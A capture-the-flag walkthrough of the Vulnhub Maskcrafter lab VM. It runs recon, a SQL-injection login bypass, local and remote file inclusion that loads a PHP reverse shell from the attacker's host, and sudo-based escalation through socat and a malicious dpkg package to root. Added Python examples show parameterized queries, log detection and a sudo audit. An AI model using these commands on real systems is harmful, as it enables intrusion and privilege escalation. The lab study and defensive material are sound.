Vulnhub Maskcrafter Target Machine: Detailed Testing Walkthrough


Maskcrafter

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                        
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:06      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:4c:3f:93      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.254  08:00:27:1c:48:cc      1      60  PCS Systemtechnik GmbH  

Using the netdiscover tool on Kali Linux, the target host's IP address is identified as 192.168.56.254.

NMAP scan

┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-09 19:59 EDT
Nmap scan report for www.armour.local (192.168.56.254)
Host is up (0.000073s latency).
Not shown: 65526 closed tcp ports (reset)
PORT      STATE SERVICE  VERSION
21/tcp    open  ftp      vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 112      115          4096 Mar 30  2020 pub
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.56.206
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp    open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8f1b43230a248c66ad3da2b969334dd7 (RSA)
|   256 8a2c857c2d9622f698f24ab67a88df23 (ECDSA)
|_  256 aca799159cbf6944d9c2962a8f799b6d (ED25519)
80/tcp    open  http     Apache httpd 2.4.29 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/debug
| http-title: Maskcrafter(TM) Login Page
|_Requested resource was login.php
|_http-server-header: Apache/2.4.29 (Ubuntu)
111/tcp   open  rpcbind  2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      35771/tcp6  mountd
|   100005  1,2,3      35951/udp   mountd
|   100005  1,2,3      47498/udp6  mountd
|   100005  1,2,3      50685/tcp   mountd
|   100021  1,3,4      45195/tcp6  nlockmgr
|   100021  1,3,4      46199/tcp   nlockmgr
|   100021  1,3,4      48207/udp6  nlockmgr
|   100021  1,3,4      53602/udp   nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
2049/tcp  open  nfs_acl  3 (RPC #100227)
38041/tcp open  mountd   1-3 (RPC #100005)
45351/tcp open  mountd   1-3 (RPC #100005)
46199/tcp open  nlockmgr 1-4 (RPC #100021)
50685/tcp open  mountd   1-3 (RPC #100005)
MAC Address: 08:00:27:1C:48:CC (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.48 seconds

Getting a shell

┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ ftp 192.168.56.254               
Connected to 192.168.56.254.
220 Welcome to maskcrafter(TM) FTP service.
Name (192.168.56.254:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||28847|)
150 Here comes the directory listing.
drwxr-xr-x    3 0        115          4096 Mar 21  2020 .
drwxr-xr-x    3 0        115          4096 Mar 21  2020 ..
drwxr-xr-x    2 112      115          4096 Mar 30  2020 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||63424|)
150 Here comes the directory listing.
drwxr-xr-x    2 112      115          4096 Mar 30  2020 .
drwxr-xr-x    3 0        115          4096 Mar 21  2020 ..
-rw-r--r--    1 0        0             430 Mar 30  2020 NOTES.txt
-rw-r--r--    1 0        0             229 Mar 23  2020 cred.zip
226 Directory send OK.
ftp> get NOTES.txt
local: NOTES.txt remote: NOTES.txt
229 Entering Extended Passive Mode (|||15955|)
150 Opening BINARY mode data connection for NOTES.txt (430 bytes).
100% |********************************************************************************|   430      273.03 KiB/s    00:00 ETA
226 Transfer complete.
430 bytes received in 00:00 (224.31 KiB/s)
ftp> get cred.zip
local: cred.zip remote: cred.zip
229 Entering Extended Passive Mode (|||30982|)
150 Opening BINARY mode data connection for cred.zip (229 bytes).
100% |********************************************************************************|   229      427.59 KiB/s    00:00 ETA
226 Transfer complete.
229 bytes received in 00:00 (197.90 KiB/s)
ftp> quit
221 Goodbye.
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ cat NOTES.txt     
Dear Web Administrator,

I've got a few points to make:

1.) Please choose a stronger password for /debug web-directory.
Having a username as 'admin' is already guessable but selecting a dictionary password is a big NO-NO.

2.) Please revisit the SQL code to prevent SQL injections because the way it is now, it is absolutely terrible.
Basically, we are hoping and praying that no hacker ever finds out about this.

Regards,
Root
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ ls -alh
total 20K
drwxr-xr-x  2 kali kali 4.0K Apr  9 20:00 .
drwxr-xr-x 83 kali kali 4.0K Apr  9 19:54 ..
-rw-r--r--  1 kali kali  229 Mar 23  2020 cred.zip
-rw-r--r--  1 root root 2.7K Apr  9 19:59 nmap_full_scan
-rw-r--r--  1 kali kali  430 Mar 29  2020 NOTES.txt
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ unzip cred.zip       
Archive:  cred.zip
[cred.zip] cred.txt password:                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ zip2john cred.zip > hashes
ver 1.0 efh 5455 efh 7875 cred.zip/cred.txt PKZIP Encr: 2b chk, TS_chk, cmplen=47, decmplen=35, crc=5D29BC84 ts=63CD cs=63cd type=0
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 DONE (2023-04-09 20:00) 0g/s 9562Kp/s 95

john did not crack the cred.zip password, and the VM author also hints that cracking is not needed.

┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ showmount -e 192.168.56.254                                
Export list for 192.168.56.254:

The target host exports no NFS shares.

Browsing to port 80 from Kali Linux shows a user login page, which is easily bypassed with admin' or 1=1 -- .
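Why that username works, and what the fix looks like, as an added example that is not code from the original write-up or from the target VM. Python's sqlite3 stands in for the VM's MySQL backend; the table layout, the account and the function names are assumptions, since the page never shows the login query.

```python
import hashlib
import hmac
import os
import sqlite3

PAYLOAD = "admin' or 1=1 -- "  # username string used in this write-up


def kdf(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def make_db() -> sqlite3.Connection:
    # Constructed schema and account; the real `login` table is not shown on the page.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE login_weak (username TEXT, password TEXT)")
    db.execute("INSERT INTO login_weak VALUES ('admin', 'constructed-secret')")
    db.execute("CREATE TABLE login_safe (username TEXT PRIMARY KEY, salt BLOB, pw BLOB)")
    salt = os.urandom(16)
    db.execute("INSERT INTO login_safe VALUES (?, ?, ?)",
               ("admin", salt, kdf("constructed-secret", salt)))
    return db


def login_concat(db, username: str, password: str) -> bool:
    # Vulnerable: input is spliced into the SQL text, so the quote in `username`
    # closes the string literal and the remainder is parsed as SQL.
    sql = ("SELECT 1 FROM login_weak WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone() is not None


def login_param(db, username: str, password: str) -> bool:
    # Hardened: the placeholder keeps `username` as data, and the password is
    # checked against a salted hash outside the query, in constant time.
    row = db.execute("SELECT salt, pw FROM login_safe WHERE username = ?",
                     (username,)).fetchone()
    if row is None:
        return False
    salt, stored = row
    return hmac.compare_digest(kdf(password, salt), stored)


if __name__ == "__main__":
    db = make_db()
    print("concatenated query accepts payload:", login_concat(db, PAYLOAD, "x"))
    print("parameterized query accepts payload:", login_param(db, PAYLOAD, "x"))
```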

After logging in, the page source contains a comment:

<i>This webpage was created out of urgency and as such some features are still buggy and may not work as intended.</i><br><pre>DB connection ok.</pre><hr>Development in progress, please report any bugs to admin@covid19.localhost<pre>Due to the increase demand for our product, you are to ramp up your productivity by 200%, else suffer a pay cut!</pre>
<html>
<head><title>Employee page</title></head>
<body>
	<h3>Welcome admin' or 1=1 -- !</h3>	

	<!-- <p><a href="?page=warning.php">Director's message</a></p> -->
	<a href="logout.php">Logout</a>
</body>
</html>

Visit the link in the comment.

Visiting the first URL below returns an unchanged page, but note the page parameter, which may be vulnerable to local file inclusion:

http://192.168.56.254/index.php?page=warning.php
http://192.168.56.254/index.php?page=../../../../../etc/passwd

Visiting the URL above returns:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
userx:x:1000:1000:userx:/home/userx:/bin/bash
mysql:x:111:113:MySQL Server,,,:/nonexistent:/bin/false
researcherx:x:1001:1001:,,,:/home/researcherx:/bin/bash
ftp:x:112:115:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
statd:x:113:65534::/var/lib/nfs:/usr/sbin/nologin
evdaez:x:1002:1002:,,,:/home/evdaez:/bin/bash

Next, test whether a remote file inclusion vulnerability also exists:

Start an HTTP server on Kali Linux:

http://192.168.56.254/index.php?page=http://192.168.56.206:8000/test.txt

The response:

jason,great

This shows that the target host is vulnerable to remote file inclusion.
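The requests above leave a clear trace in the web server's access log. The detection logic below is an added example, not part of the original write-up; the log lines are constructed in Apache combined format from the URLs shown above, and the function names are hypothetical.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed access-log lines built from the URLs in this write-up.
SAMPLE_LOG = [
    '192.168.56.206 - - [09/Apr/2023:20:05:01 -0400] "GET /index.php?page=warning.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.168.56.206 - - [09/Apr/2023:20:05:09 -0400] "GET /index.php?page=../../../../../etc/passwd HTTP/1.1" 200 2101 "-" "Mozilla/5.0"',
    '192.168.56.206 - - [09/Apr/2023:20:06:30 -0400] "GET /index.php?page=http://192.168.56.206:8000/test.txt HTTP/1.1" 200 540 "-" "Mozilla/5.0"',
    '192.168.56.206 - - [09/Apr/2023:20:07:12 -0400] "GET /index.php?page=http://192.168.56.206:8000/shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '192.168.56.206 - - [09/Apr/2023:20:08:40 -0400] "GET /index.php?page=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 2101 "-" "Mozilla/5.0"',
]

REQ = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3})')
SCHEME = re.compile(r"^[a-z][a-z0-9+.\-]*:")


def classify(value: str) -> str:
    """Label one `page` value after undoing repeated URL-encoding."""
    for _ in range(3):  # bounded, so nested encodings cannot loop forever
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    v = value.lower().replace("\\", "/")
    if SCHEME.match(v) or v.startswith("//"):
        return "remote-include"   # value names a URL, not a local file
    if "../" in v or v.startswith("/"):
        return "path-traversal"   # value escapes the intended directory
    return "ok"


def scan(lines, param="page"):
    """Return (client, verdict, status) for every suspicious request line."""
    findings = []
    for line in lines:
        m = REQ.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        query = target.partition("?")[2]
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            verdict = classify(value)
            if verdict != "ok":
                findings.append((client, verdict, int(status)))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

An include of an http:// URL only works when PHP's allow_url_include setting is enabled, so it should stay off, and the page parameter should be mapped to a fixed allowlist of local files.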

Next, prepare a PHP reverse shell file on Kali Linux, then request that file to obtain a shell:

http://192.168.56.254/index.php?page=http://192.168.56.206:8000/shell.php
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ sudo nc -nlvp 5555                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 39276
Linux maskcrafter 4.15.0-91-generic #92-Ubuntu SMP Fri Feb 28 11:09:48 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 08:15:22 up 17 min,  0 users,  load average: 0.00, 0.00, 0.02
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@maskcrafter:/$ 

Privilege escalation

www-data@maskcrafter:/var/www/html$ cat db.php
cat db.php
<?php

$connection = mysqli_connect("localhost", "web", "P@ssw0rdweb", "mydatabase");

if (!$connection)
{
        die("<h4>Connection failed -> " . mysqli_connect_error() . "</h4>");
}

echo "<i>This webpage was created out of urgency and as such some features are still buggy and may not work as intended.</i><br>";

echo "<pre>";
echo "DB connection ok.";
echo "</pre>";
echo "<hr>";


This reveals the username and password for the database connection.

www-data@maskcrafter:/home$ mysql -uweb -p 
mysql -uweb -p 
Enter password: P@ssw0rdweb

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 59
Server version: 5.7.29-0ubuntu0.18.04.1 (Ubuntu)

Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mydatabase         |
| mysql              |
| performance_schema |
| phpmyadmin         |
| sys                |
+--------------------+
6 rows in set (0.01 sec)

mysql> use mydatabase;
use mydatabase;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+----------------------+
| Tables_in_mydatabase |
+----------------------+
| creds                |
| login                |
+----------------------+
2 rows in set (0.00 sec)

mysql> select * from creds;
select * from creds;
+----+--------------+-------------+
| id | data_type    | password    |
+----+--------------+-------------+
|  1 | zip password | cred12345!! |
+----+--------------+-------------+
1 row in set (0.00 sec)

mysql> 

This should be the password for cred.zip.

┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ unzip cred.zip
Archive:  cred.zip
[cred.zip] cred.txt password: 
 extracting: cred.txt                
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ cat cred.txt 
userx:thisismypasswordforuserx2020

This gives userx's password; switch the shell to that user.

userx@maskcrafter:~$ sudo -l
sudo -l
Matching Defaults entries for userx on maskcrafter:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User userx may run the following commands on maskcrafter:
    (evdaez) NOPASSWD: /scripts/whatsmyid.sh
userx@maskcrafter:~$ ls -alh /scripts/whatsmyid.sh
ls -alh /scripts/whatsmyid.sh
-rwxr-xr-x 1 userx userx 15 Mar 30  2020 /scripts/whatsmyid.sh
userx@maskcrafter:~$ cat /scripts/whatsmyid.sh
cat /scripts/whatsmyid.sh
#!/bin/bash
id
userx@maskcrafter:~$ echo '/bin/bash' >> /scripts/whatsmyid.sh
echo '/bin/bash' >> /scripts/whatsmyid.sh

userx@maskcrafter:~$ sudo -u evdaez /scripts/whatsmyid.sh
sudo -u evdaez /scripts/whatsmyid.sh
uid=1002(evdaez) gid=1002(evdaez) groups=1002(evdaez)
bash: /home/userx/.bashrc: Permission denied
evdaez@maskcrafter:~$ id
id
uid=1002(evdaez) gid=1002(evdaez) groups=1002(evdaez)

Successfully switched to user evdaez.

evdaez@maskcrafter:/home/evdaez$ sudo -l
sudo -l
Matching Defaults entries for evdaez on maskcrafter:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User evdaez may run the following commands on maskcrafter:
    (researcherx) NOPASSWD: /usr/bin/socat
evdaez@maskcrafter:/home/evdaez$ sudo -u researcherx /usr/bin/socat stdin exec:/bin/sh
<do -u researcherx /usr/bin/socat stdin exec:/bin/sh
id
id
uid=1001(researcherx) gid=1001(researcherx) groups=1001(researcherx),4(adm),24(cdrom),30(dip),46(plugdev),108(lxd)

Using socat, successfully switched to user researcherx.

cd /tmp
TF=$(mktemp -d)
echo 'exec /bin/sh' > $TF/x.sh
fpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF
Doing `require 'backports'` is deprecated and will not load any backport in the next major release.
Require just the needed backports instead, or 'backports/latest'.
{:timestamp=>"2023-04-10T08:42:18.755150+0000", :message=>"Debian packaging tools generally labels all files in /etc as config files, as mandated by policy, so fpm defaults to this behavior for deb packages. You can disable this default behavior with --deb-no-default-config-files flag", :level=>:warn}
{:timestamp=>"2023-04-10T08:42:18.786663+0000", :message=>"Created package", :path=>"x_1.0_all.deb"}
sudo /usr/bin/dpkg -i x_1.0_all.deb             
(Reading database ... 96141 files and directories currently installed.)
Preparing to unpack x_1.0_all.deb ...
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls -alh
total 88K
drwx------  9 root root 4.0K Mar 30  2020 .
drwxr-xr-x 28 root root 4.0K Mar 30  2020 ..
-rw-r--r--  1 root root   39 Mar 20  2020 .bash_aliases
lrwxrwxrwx  1 root root    9 Mar 20  2020 .bash_history -> /dev/null
-rw-r--r--  1 root root 3.1K Mar 20  2020 .bashrc
drwx------  2 root root 4.0K Mar 21  2020 .cache
-rw-r--r--  1 root root   22 Mar 20  2020 .gdbinit
drwxr-xr-x  3 root root 4.0K Mar 20  2020 .gem
drwx------  3 root root 4.0K Mar 21  2020 .gnupg
-rw-------  1 root root   38 Mar 20  2020 .lesshst
drwxr-xr-x  3 root root 4.0K Mar 20  2020 .local
drwxr-xr-x  4 root root 4.0K Mar 20  2020 peda
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   75 Mar 23  2020 root.txt
-rw-r--r--  1 root root   75 Mar 20  2020 .selected_editor
drwx------  2 root root 4.0K Mar 20  2020 .ssh
drwxr-xr-x  2 root root 4.0K Mar 21  2020 .vim
-rw-------  1 root root  20K Mar 30  2020 .viminfo
-rw-r--r--  1 root root  215 Mar 21  2020 .wget-hsts
cat root.txt
Congrats on finishing this VM...

Please tweet me your walkthrough @evdaez

At this point we have a root shell and the root flag.
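Each hop in this chain came from a sudo rule: a script that the invoking user owned and could edit, and binaries (socat, dpkg) that run caller-chosen programs by design. The audit below is an added example, not from the original write-up; it parses sudo -l output (the two rule lines are copied from the sessions above) and checks each command's ownership and permissions on the host where it runs. The function names and the SHELL_CAPABLE set are assumptions.

```python
import os
import re
import stat

# Rule lines copied from the two `sudo -l` sessions in this write-up.
PAGE_SUDO_L = """\
User userx may run the following commands on maskcrafter:
    (evdaez) NOPASSWD: /scripts/whatsmyid.sh
User evdaez may run the following commands on maskcrafter:
    (researcherx) NOPASSWD: /usr/bin/socat
"""

RULE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>/\S+)")
# Assumption: only the two binaries this write-up used; extend per site policy.
SHELL_CAPABLE = {"socat", "dpkg"}


def parse_rules(sudo_l_output):
    """Return (runas, [tags], command_path) for every rule line."""
    rules = []
    for line in sudo_l_output.splitlines():
        m = RULE.match(line)
        if m:
            tags = m["tags"].replace(":", " ").split()
            rules.append((m["runas"], tags, m["cmd"]))
    return rules


def path_issues(cmd):
    """Flag a sudo target that someone other than root can modify or replace."""
    issues = []
    for target, label in ((cmd, "command"), (os.path.dirname(cmd), "directory")):
        try:
            st = os.stat(target)
        except OSError:
            issues.append(f"{label} not found on this host")
            continue
        if st.st_uid != 0:
            issues.append(f"{label} owned by uid {st.st_uid}, not root")
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            issues.append(f"{label} is group/other writable")
    return issues


def audit(sudo_l_output):
    """Map each risky command path to (runas, tags, [issues])."""
    report = {}
    for runas, tags, cmd in parse_rules(sudo_l_output):
        issues = path_issues(cmd)
        if os.path.basename(cmd) in SHELL_CAPABLE:
            issues.append("binary runs caller-chosen programs by design")
        if issues:
            report[cmd] = (runas, tags, issues)
    return report


if __name__ == "__main__":
    for cmd, (runas, tags, issues) in audit(PAGE_SUDO_L).items():
        print(cmd, "as", runas, tags, "->", "; ".join(issues))
```

Run on the target, the first rule is flagged because /scripts/whatsmyid.sh is owned by userx rather than root, which is exactly what let userx append a line to it.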
